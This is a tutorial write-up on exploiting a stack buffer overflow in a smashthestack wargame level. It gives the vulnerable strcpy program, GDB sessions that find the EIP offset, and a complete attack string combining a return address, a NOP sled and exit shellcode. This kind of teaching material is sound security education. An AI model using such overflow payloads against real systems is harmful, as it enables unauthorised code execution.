This is a continuation of my previous article on Stack Overflows - Basics of EIP Overwrite..I suggest a glance over it before reading further... Again in this article we'll be using a vulnerable program to demonstrate our attack.. Our main motive is to change the direction of the vulnerable program and make it do what we want from it to do... In this article I am now bringing the exploitation to a new level..We'll be exploiting a simple Wargame level example And i'll be exploiting this code using their machine only.. Exploiting Code: #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buf[128]; if(argc < 2) return 1; strcpy(buf, argv[1]); printf("%s\n", buf); return 0; } I'll be using a basic exit shellcode for demonstration purposes but any shellcode of a considerable size can be used to exploit this program.. SO lets wear our grey thinking hats and get started.. Basically to exploit this program we have to overwrite th EIP register which we have already learnt How? In the previos tutorial...So...I'll nnot be repeating that... Now what we want is to overwrite the EIP and make it point to our shellcode to gramt us the remote controler.. So lets first ssh to their machine :- Code: aneesh@aneesh-laptop:~$ ssh level5@io.smashthestack.org -p2224 level5@io.smashthestack.org's password: ______ _____ /\__ _\ /\ __`\ \/_/\ \/ \ \ \/\ \ Levels are in /levels \ \ \ \ \ \ \ \ Passes are in ~/.pass \_\ \__\ \ \_\ \ /\_____\\ \_____\ Server admin: beach (beach@smashthestack.org) \/_____/ \/_____/ Server janitor: bla 1. No DoS, local or otherwise 2. Do not try to connect to remote systems from this box 3. Only two connections per IP are allowed 4. Quotas are in place so don't waste resources 5. This rules list is not all inclusive and is subject to change 6. Have fuN++ (28 levels) - use long(>5char) names in /tmp, short stuff is periodically deleted, as are easily guessable ones - o and feel free to leave your email in /home/email.list (it's writeonly) - Thanks everybody for the new translations! level5@io:~$ level5@io:~$ cd /levels/ level5@io:/levels$ ls beta level06_alt level10 level16 level23.c level01 level06_alt.c level10.c level16.c level24 level02 level06_alt.pass level11 level16.pass level24.c level02_alt level06.c level11.c level17 level25 level02_alt.c level07 level12 level17.c level25.c level03 level07_alt level12.c level18 level26 level03.c level07_alt.c level12.pass level18.c level26.l level04 level07.c level13 level18_cross level26.y level04.c level08 level13.c level19 level27 level05 level08_alt level14 level19.c level27.c level05_alt level08_alt.cpp level14.c level20 level27.pass level05_alt.c level08.c level15 level21 level28 level05.c level09 level15.c level22 level28.c level06 level09.c level15.pass level23 level5@io:/levels$ cat level0 level01 level04.c level06_alt.c level08 level02 level05 level06_alt.pass level08_alt level02_alt level05_alt level06.c level08_alt.cpp level02_alt.c level05_alt.c level07 level08.c level03 level05.c level07_alt level09 level03.c level06 level07_alt.c level09.c level04 level06_alt level07.c level5@io:/levels$ cat level0 level01 level04.c level06_alt.c level08 level02 level05 level06_alt.pass level08_alt level02_alt level05_alt level06.c level08_alt.cpp level02_alt.c level05_alt.c level07 level08.c level03 level05.c level07_alt level09 level03.c level06 level07_alt.c level09.c level04 level06_alt level07.c level5@io:/levels$ cat level0 level01 level04.c level06_alt.c level08 level02 level05 level06_alt.pass level08_alt level02_alt level05_alt level06.c level08_alt.cpp level02_alt.c level05_alt.c level07 level08.c level03 level05.c level07_alt level09 level03.c level06 level07_alt.c level09.c level04 level06_alt level07.c level5@io:/levels$ cat level05 level05 level05_alt level05_alt.c level05.c level5@io:/levels$ Note : i'll not be revealing the password for this level as its not allowed.. Lets now run it in GDB and exploit :- Code: level5@io:/levels$ gdb ./level05 GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... (gdb) Now lets just place a breakpoint at Now lets place a breakpoint on the beginning of the program and lets run it... Code: (gdb) break main Breakpoint 1 at 0x80483bd Lets just run it with a argument of 160 A's.. We'll be using basic python code to make our Attack-string(input)... Code: (gdb) run `python -c 'print"\x41"*160'` Starting program: /levels/level05 `python -c 'print"\x41"*160'` Breakpoint 1, 0x080483bd in main () Now just step down the program and see what happens Code: (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0x41414141 in ?? () (gdb) Ok that's pretty obvious that we have overwriiten the EIP with 0x41414141...(As its giving a cannot access memory at adress...As 0x41414141 is a random address and is not present in the present program user space and thus, the program cannot jump to it..) Now lets try some various outputs to get a basic structure of what's happening.. Code: (gdb) run `python -c 'print"\x41"*140'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Cannot access memory at address 0x41414145 (gdb) So , now can you feel something … It basically means that to overwrite EIP with our desired Address we conclude with the following attack string :- Code: [Garbage string] [EIP] | | | | Should be 140 The desired chars long address overwrite Lets test it :- Code: (gdb) run `python -c 'print"\x41"*140+"\x42"*4'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB 0x42424242 in ?? () Boom... We have total control over EIP overwrite... Now we need to inject our shellcode..and point to it.. Lets first look where our data goes.. Code: (gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC 0x42424242 in ?? () (gdb) x/10bx $esp 0xbfffdc80: 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0xbfffdc88: 0x43 0x43 (gdb) Ok so from the above we conclude with the following attack-string Code: [Garbage string] [EIP] [ESP] | | | | | | Should be 140 The desired The desired chars long address overwrite data to enter in esp(stack) So we have a large about of data space in the ESP..We can just overwrite it with our shellcode and overwrite the EIP with its address.. Lets do it!! We'll again be using the same exit shellcode made in our previous article... Code: (gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀ 0xbfffdc80 in ?? () (gdb) continue Continuing. Program exited with code 07. (gdb) Woah!! We did it.. Now the explanation Attack-string Code: "\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80" | | | | | | | | Garbage Hard coded [NOP - ] The exit shellcode String address of esp in [SLED ] the little endian format The NOP-Sled is simply a set of \x90(nop) instructions this istruction basically does nothing.. We used this to make our attack-string more usable... as with every new execution of the program the address will somewhat change..If we'll not be using the nop sled … Our attack-string will fail... Thats all for this article..Stay tuned for more